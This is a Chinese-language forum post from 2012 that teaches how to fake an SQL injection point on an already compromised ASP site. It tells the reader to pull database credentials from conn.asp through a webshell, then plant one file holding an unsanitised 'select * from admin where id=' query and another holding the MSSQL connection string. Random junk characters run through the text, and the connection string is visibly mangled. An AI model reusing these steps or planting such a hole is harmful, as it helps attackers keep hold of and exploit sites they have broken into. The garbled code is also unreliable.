首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:! i- {. c, p1 H C
ASP/Visual Basic代码3 R& T/ _" l8 y
<!--#include file="xx.asp"-->
' y8 B1 N1 M4 G) }5 h<%
7 y8 f! u& t; o4 X* G0 k& Fset rs=server.createobject("ADODB.recordset")
( Z/ E X* y: }id = request("id") q: O2 W' L# S0 F0 O
strSQL = "select * from admin where id=" & id ! J8 |* m3 d. K7 H; y
rs.open strSQL,conn,1,3 , w3 @- P: K+ b# m
rs.close 8 M( @4 V) f0 Y: v: x
%> * L) f! K" A( V- V) _
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
- ^( {/ H' I4 E然后就要构造一个连接数据库的文件了,代码如下:4 @ x: t$ u. ^
ASP/Visual Basic代码& t( V+ ~: P2 q* L/ c# ~
<%
" K$ ^ y2 C7 k$ q3 P: I# x2 ~% M- W2 fstrSQLServerName = "000.000.000.000" '服务器名称或地址
* h' Q8 b9 b/ l( G) V) @strSQLDBUserName = "sqlname" '数据库帐号 + V1 {: r. e- X# Q+ R
strSQLDBPassword = "sqlpass" '数据库密码
k+ O- ~0 @8 k" J* ]strSQLDBName = "sqldataname" '数据库名称 ( F: d- h! w: L5 ^
Set conn = Server.CreateObject("ADODB.Connection")
; f6 z* r( S+ p2 y$ k( `strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
3 [& \* ^4 d0 R8 r6 tconn.open strCon
8 e, g+ Q4 j/ ]( s! d; D" R2 o0 a%>
, C! d9 p6 k/ a这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功- i/ m+ c I6 [- ?9 u. I
|
发表于 2012-9-13 17:53:08
收藏
支持
反对